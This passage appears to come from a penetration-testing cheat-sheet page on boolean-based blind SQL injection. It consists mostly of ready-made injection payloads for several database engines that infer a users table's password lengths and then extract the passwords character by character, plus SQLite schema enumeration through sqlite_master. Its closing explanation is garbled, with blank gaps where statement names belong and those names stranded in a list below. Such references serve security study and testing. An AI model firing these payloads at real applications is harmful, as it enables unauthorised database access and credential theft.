1' AND (SELECT HEX(SUBSTR(sql,1,1)) FROM sqlite_master WHERE type!='meta' and sql NOT NULL AND name='TABLE_NAME_HERE')=HEX('C')--

-- If True, the second char of sql field is R
1' AND (SELECT HEX(SUBSTR(sql,2,1)) FROM sqlite_master WHERE type!='meta' and sql NOT NULL AND name='TABLE_NAME_HERE')=HEX('R')--

Dump values

First, retrieve the length of the value (we take password column as example):

1' AND (SELECT LENGTH(password) FROM users LIMIT 0,1)=9-- -  #True -> 1st password is 9 char

Second, retrieve values

-- If True, the first password's char is p
1'AND (SELECT HEX(SUBSTRING(password, 1, 1))FROM users LIMIT 0,1)=HEX('p')-- -

-- If True, the second password's char is a
1'AND (SELECT HEX(SUBSTRING(password, 2, 1))FROM users LIMIT 0,1)=HEX('a')-- -

First, retrieve the length of the value (we take password column as example):

-- True -> 1st password is 9 char
1' AND (SELECT TOP 1 LEN(password) FROM users)=9--

-- True -> 2st password is 9 char
1' AND (SELECT TOP 1 LEN(password) FROM users WHERE password NOT IN(SELECT TOP 1 password FROM admin))=9--

Second, retrieve values

-- If True, the first password's char is p
1'AND (SELECT TOP 1 ASCII(SUBSTRING(password, 1, 1))FROM users)=112--

-- If True, the second password's char is a
1'AND (SELECT TOP 1 ASCII(SUBSTRING(password, 2, 1))FROM users)=97--

-- If True, the first char of second password is p
1'AND (SELECT TOP 1 ASCII(SUBSTRING(password, 1, 1))FROM users WHERE password NOT IN(SELECT TOP 1 password FROM admin))=112--

-- If True, the second char of second password is p
1'AND (SELECT TOP 1 ASCII(SUBSTRING(password, 2, 1))FROM users WHERE password NOT IN(SELECT TOP 1 password FROM admin))=97--

First, retrieve the length of the value (we take password column as example):

1' AND (SELECT LENGTH(password) FROM users OFFSET 0 ROWS FETCH NEXT 1 ROWS ONLY)=9--  #True -> 1st password is 9 char

Second, retrieve values

-- If True, the first password's char is p
1'AND (SELECT ASCII(SUBSTR(password, 1, 1)) FROM users OFFSET 0 ROWS FETCH NEXT 1 ROWS ONLY)=112--

-- If True, the second password's char is a
1'AND (SELECT ASCII(SUBSTR(password, 2, 1)) FROM users OFFSET 0 ROWS FETCH NEXT 1 ROWS ONLY)=97--

First, retrieve the length of the value (we take password column as example):

1' AND (SELECT LENGTH(password) FROM users LIMIT 0,1)=9--  #True -> 1st password is 9 char

Second, retrieve values

-- If True, the first password's char is p
1'AND (SELECT ASCII(SUBSTRING(password, 1, 1))FROM users LIMIT 0,1)=112--

-- If True, the second password's char is a
1'AND (SELECT ASCII(SUBSTRING(password, 2, 1))FROM users LIMIT 0,1)=97--

First, retrieve the length of the value (we take password column as example):

1' AND (SELECT LENGTH(password) FROM users LIMIT 1 OFFSET 0)=9--  #True -> 1st password is 9 char

Second, retrieve values

-- If True, the first char of first password is p
1'AND (SELECT HEX(SUBSTR(password, 1, 1)) FROM users LIMIT 1 OFFSET 0)=HEX('p')--

-- If True, the second char of first password is a
1'AND (SELECT HEX(SUBSTR(password, 2, 1)) FROM users LIMIT 1 OFFSET 0)=HEX('a')

Resources

Last updated 1 month ago

Was this helpful?

Enumeration of colums is a bit differents in SQLite. We have to enum the sqlite_schema.sql fields that stores SQL text that describes the object. This SQL text is a , , , , or statement that if evaluated against the database file when it is the main database of a would recreate the object.

CREATE TABLE
CREATE VIRTUAL TABLE
CREATE INDEX
CREATE VIEW
CREATE TRIGGER
database connection
LogoWhat is SQL Injection? Tutorial & Examples | Web Security AcademyWebSecAcademy
LogoBlind SQL InjectionDefend the Web